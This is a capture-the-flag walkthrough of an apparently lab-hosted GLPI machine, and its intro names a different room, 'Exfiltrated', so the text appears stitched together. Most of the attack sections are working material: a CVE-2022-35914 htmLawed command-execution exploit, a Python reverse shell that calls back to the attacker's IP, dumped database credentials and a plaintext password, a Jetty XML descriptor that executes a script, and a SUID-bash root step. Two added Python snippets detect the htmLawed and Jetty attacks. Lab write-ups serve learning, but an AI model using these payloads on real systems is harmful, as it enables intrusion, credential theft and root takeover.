In this walkthrough, we will be going through the Exfiltrated room from Proving Grounds. This room is rated as Easy on the platform, and it consists of exploiting CVE-2022-35914 to get the initial foothold. With the DB creds found in config files, we have to perform lateral movement, and at last, privilege escalation is done by exploiting a Jetty server instance listening on an internal localhost port. So, let’s get started without any delay.
Machine Info:
| Field | Value |
| --- | --- |
| Title | GLPI |
| IP address | 192.168.193.242 |
| Difficulty | Easy |
| OS | Linux |
| Description | GLPI is an Easy rated Linux machine which requires exploitation of CVE-2022-35914 in order to get the initial foothold. With the DB creds in config files, the attacker has to perform lateral movement, and at last, privilege escalation is done via exploitation of a Jetty server instance running on an internal localhost. |
Enumeration:
- I started off with a regular aggressive nmap scan and found only two open ports – 22 (SSH) and 80 (HTTP).
$ sudo nmap -A 192.168.193.242
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-25 12:51 IST
Nmap scan report for 192.168.193.242
Host is up (0.21s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:8.2p1:
|   [vulners CVE/exploit list omitted]
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Authentication - GLPI
| vulners:
|   cpe:/a:apache:http_server:2.4.41:
|   [vulners CVE/exploit list omitted]
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 2.6.X (86%)
OS CPE: cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 2.6.18 - 2.6.22 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   207.77 ms 192.168.45.1
2   207.71 ms 192.168.45.254
3   208.58 ms 192.168.251.1
4   208.72 ms 192.168.193.242

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.48 seconds
- Enumerated the web server on port 80 and it revealed a login panel for GLPI.
- Fired gobuster at the target to reveal hidden directories. It returned a bunch of directories in the results.
gobuster dir -u http://192.168.193.242/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x php
- Looking inside the files directory reveals a directory listing of various assets related to the web application.
Initial Access:
- Next, I looked into the /vendor directory, which exposes the htmLawed 1.2.6 test script (htmLawedTest.php); it is vulnerable to CVE-2022-35914. Used the below exploit on it.
#!/bin/bash
curl -s -d 'sid=foo&hhook=exec&text=id' -b 'sid=foo' http://192.168.193.242/vendor/htmlawed/htmlawed/htmLawedTest.php | egrep '\ \[[0-9]+\] =\>' | sed -E 's/\ \[[0-9]+\] =\> (.*)<br \/>/\1/'
- I captured the request via Burp Suite and added the below parameters to the request before forwarding it to the server. Once the request is processed, we get the contents of the /etc/passwd file.
sid=1rpcfmnkocd44m3mdtg1jfj7qm&text=call_user_func&hhook=array_map&hexec=passthru&spec[0]=&spec[1]=cat+/etc/passwd
- Next, we will use the below parameters to spawn a reverse shell on the target, giving us a connection back at our netcat listener.
sid=19r7u6o4pl0kn34q54le48sghm&text=call_user_func&hhook=array_map&hexec=passthru&spec[0]=&spec[1]=python3+-c+'import+socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.154",80));os.dup2(s.fileno(),0);+os.dup2(s.fileno(),1);+os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
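As an added defender-side example (not part of the original walkthrough): a small Apache access-log check that flags hits on the htmLawed test script, which should never be web-reachable on a GLPI install. The log-format regex and the sample lines are constructed for this example.

```python
import re
from typing import Dict, List
# Apache combined log format, enough fields for this check (constructed regex).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# htmLawed's bundled test script; leaving it web-reachable is what CVE-2022-35914 abuses.
TEST_SCRIPT = "htmlawedtest.php"
# Parameters the test script treats as callback names / callback arguments.
CALLBACK_PARAMS = ("hhook=", "hexec=", "spec[")

def parse_line(line: str) -> Dict[str, str]:
    m = LOG_RE.match(line)
    if not m:
        raise ValueError(f"unparsable log line: {line!r}")
    return m.groupdict()

def classify(entry: Dict[str, str]) -> str:
    """Alert level for one parsed entry: none, medium or high."""
    path, _, query = entry["target"].partition("?")
    if not path.lower().endswith(TEST_SCRIPT):
        return "none"
    # A POST (callback parameters travel in the body) or callback names in the
    # query string match the exploitation pattern; any other hit is still worth a look.
    if entry["method"] == "POST" or any(p in query for p in CALLBACK_PARAMS):
        return "high"
    return "medium"

def find_alerts(lines: List[str]) -> List[Dict[str, str]]:
    alerts = []
    for line in lines:
        entry = parse_line(line)
        level = classify(entry)
        if level != "none":
            alerts.append({"ip": entry["ip"], "level": level,
                           "target": entry["target"], "status": entry["status"]})
    return alerts

# Constructed sample lines (not taken from the original page).
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Jan/2024:12:55:01 +0530] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [25/Jan/2024:12:55:07 +0530] "GET /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 200 8891 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [25/Jan/2024:12:55:30 +0530] "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 200 9020 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [25/Jan/2024:12:56:02 +0530] "GET /vendor/htmlawed/htmlawed/htmLawedTest.php?sid=x&hhook=exec&text=id HTTP/1.1" 200 9020 "-" "curl/7.88"',
]

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_LOG):
        print(alert)
```

The simplest fix on the server side is to delete the test script (or block the vendor path in the web server), after which any hit on it returns a 404 and the medium-level alerts become the interesting ones.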
Lateral Movement (Betty):
- Once we landed on a shell, I enumerated the file system for any file containing sensitive information. The config_db.php file holds the DB creds for the GLPI database.
glpi: glpi_db_password
- Used the found creds to log into the DB and dump the contents of the users table, which also includes the users’ password hashes.
mysql -u glpi -pglpi_db_password
show databases;
use glpi;
show tables;
select * from glpi_users;
- Once I got the password hash of user betty, I tried to replace it with a hash of my own password to get access as her. However, it didn’t seem to work.
betty: $2y$10$jG8/feTYsguxsnBqRG6.judCDSNHY4it8SgBTAHig9pMkfmMl9CFa
password: $2a$10$mRrl51am2AJdOJPxNLIvTOhonLn5x0mr2nJQ4pwj1c4usbnPI5AyS
update glpi_users SET password = '$2a$10$mRrl51am2AJdOJPxNLIvTOhonLn5x0mr2nJQ4pwj1c4usbnPI5AyS' where name = 'betty';
- Looking around the other tables, I found betty’s plaintext password stored in the glpi_itilfollowups table.
select * FROM glpi_itilfollowups;
- Using the found password, logged into the target via SSH as user betty and captured the local flag.
betty: SnowboardSkateboardRoller234
Privilege Escalation:
- Next, enumerated the running processes on the target using the below command. It revealed that a web server is running on localhost on port 8080.
ps auxww
- Set up SSH local port forwarding so that the target’s port 8080 is reachable on my local port 1234.
ssh -L 1234:localhost:8080 betty@192.168.193.242
- Once the tunnel was up, I was able to access the web server on port 1234 at my localhost. It was running a Jetty server.
- Found out that the running Jetty server is vulnerable to the technique described in the post below.
Resource: https://twitter.com/ptswarm/status/1555184661751648256?lang=en
- First, we have to create a root.sh file that sets the SUID bit on the bash binary (the command is shown below). We will then use the XML code below to make Jetty execute root.sh. For that, just place the XML file inside the webapps directory of the Jetty installation.
Exploit: https://github.com/Mike-n1/tips/blob/main/JettyShell.xml
<?xml version="1.0"?>
<!DOCTYPE Configure PUBLIC "-//Jetty//Configure//EN" "https://www.eclipse.org/jetty/configure_10_0.dtd">
<Configure class="org.eclipse.jetty.server.handler.ContextHandler">
  <Call class="java.lang.Runtime" name="getRuntime">
    <Call name="exec">
      <Arg>
        <Array type="String">
          <Item>/tmp/root.sh</Item>
        </Array>
      </Arg>
    </Call>
  </Call>
</Configure>
cd /opt/jetty/jetty-base/webapps/
echo "chmod +s /bin/bash" > /tmp/root.sh
chmod +x /tmp/root.sh
nano shell.xml
- Once the SUID bit is set on bash, execute it using the below command and become root.
bash -p
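As an added defender-side example (not part of the original walkthrough or the linked exploit): an audit that parses Jetty context descriptors dropped into webapps and reports any <Call> chain that resolves to process execution, which is how the descriptor above gets root.sh run. Both sample descriptors are constructed for this example; the class and method sets are an assumption about what a benign descriptor never needs.

```python
import xml.etree.ElementTree as ET
from typing import List, Tuple
# Classes and method names a context descriptor has no legitimate reason to call.
DANGEROUS_CLASSES = {"java.lang.Runtime", "java.lang.ProcessBuilder", "java.lang.System"}
DANGEROUS_METHODS = {"exec", "start", "load", "loadLibrary"}

def _args_of(call: ET.Element) -> List[str]:
    """Literal argument strings of one <Call>: <Item> entries of an <Array> or bare <Arg> text."""
    args = []
    for arg in call.findall("Arg"):
        args.extend((item.text or "").strip() for item in arg.iter("Item"))
        if arg.text and arg.text.strip():
            args.append(arg.text.strip())
    return args

def audit_descriptor(xml_text: str) -> List[Tuple[str, str, List[str]]]:
    """Return (class, method, args) for every <Call> that resolves to code execution.
    A nested <Call> acts on the result of its parent, so it inherits the parent's
    class: Runtime.getRuntime().exec(...) is reported as java.lang.Runtime.exec."""
    findings = []

    def walk(elem: ET.Element, inherited_cls: str) -> None:
        for child in elem:
            cls = inherited_cls
            if child.tag == "Call":
                cls = child.get("class", inherited_cls)
                if cls in DANGEROUS_CLASSES and child.get("name") in DANGEROUS_METHODS:
                    findings.append((cls, child.get("name"), _args_of(child)))
            walk(child, cls)

    walk(ET.fromstring(xml_text), "")
    return findings

# Constructed samples (not from the original page): the first has the shape of the
# descriptor discussed above, the second is an ordinary web app context.
MALICIOUS = """<?xml version="1.0"?>
<!DOCTYPE Configure PUBLIC "-//Jetty//Configure//EN" "https://www.eclipse.org/jetty/configure_10_0.dtd">
<Configure class="org.eclipse.jetty.server.handler.ContextHandler">
  <Call class="java.lang.Runtime" name="getRuntime">
    <Call name="exec"><Arg><Array type="String"><Item>/tmp/root.sh</Item></Array></Arg></Call>
  </Call>
</Configure>"""
BENIGN = """<?xml version="1.0"?>
<Configure class="org.eclipse.jetty.webapp.WebAppContext">
  <Set name="contextPath">/app</Set>
  <Set name="war">/opt/jetty/jetty-base/webapps/app.war</Set>
</Configure>"""

if __name__ == "__main__":
    print(audit_descriptor(MALICIOUS), audit_descriptor(BENIGN))
```

The underlying hardening is that the webapps directory must not be writable by the low-privileged account, and the Jetty process itself should not run as root, since the descriptor runs with whatever privileges Jetty has.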
- Captured the root flag and completed the machine.
Conclusion:
So that was “GLPI” for you. We started off with a regular nmap scan and found two open ports – 22 (SSH) and 80 (HTTP). Enumerated the web server on port 80, found out that it is running GLPI, and got an htmLawed directory. Looked online for any known exploit and found out that it is vulnerable to CVE-2022-35914. Used the same and got initial access on the target. Next, found DB creds in the config_db.php file. Using the creds, enumerated the database and got user betty’s plaintext password from the glpi_itilfollowups table. Performed lateral movement via SSH with user betty’s creds. Moving on, performed SSH port forwarding of port 8080 and found a Jetty server running. Exploited it using the technique discussed in a Twitter post and got root. On that note, I would take your leave and will meet you in the next one. Till then, “Happy hacking”.